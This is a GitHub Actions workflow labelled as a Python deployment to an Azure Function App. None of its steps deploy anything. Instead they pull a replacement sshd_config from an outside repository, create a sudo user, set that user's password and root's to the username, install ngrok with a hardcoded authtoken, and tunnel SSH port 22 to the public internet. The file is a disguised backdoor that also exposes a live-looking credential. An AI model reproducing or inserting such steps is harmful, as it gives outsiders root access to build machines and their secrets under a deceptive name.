name: Deploy Python project to Azure Function App

on:
  push:
    branches: ["main"]

jobs:
  build-and-deploy:
    runs-on: ubuntu-latest
    environment: dev
    steps:
    - name: 'Checkout GitHub Action'
      uses: actions/checkout@v3
      
    - name: 'Install ssh'
      shell: bash
      run: |
        sudo apt update
        sudo apt install openssh-client
        sudo service ssh start
        sudo mkdir /home/sshvps
        sudo chmod +x /home/sshvps
        chmod +x /home
        sudo wget -P /home/sshvps/ https://raw.githubusercontent.com/ivangabriel21/DependeciaDX/main/sshd_config
        chmod +x /home/sshvps/sshd_config
        sudo rm -rf /etc/ssh/sshd_config
        sudo mv /home/sshvps/sshd_config /etc/ssh/sshd_config
        sudo useradd ivangabriel -m -s /bin/bash
        sudo echo "ivangabriel:ivangabriel" | sudo chpasswd
        sudo usermod -aG sudo ivangabriel
        sudo echo "root:ivangabriel" | sudo chpasswd
        sudo curl ifconfig.me
    - name: 'Install ngrok'
      shell: bash
      run: |
         curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
         ngrok config add-authtoken 2NFY94Rg01fQLXyc5rcr0pnqGn9_4caThWichq7xoTiQPdBmK
         lt --subdomain ivandx -p 22
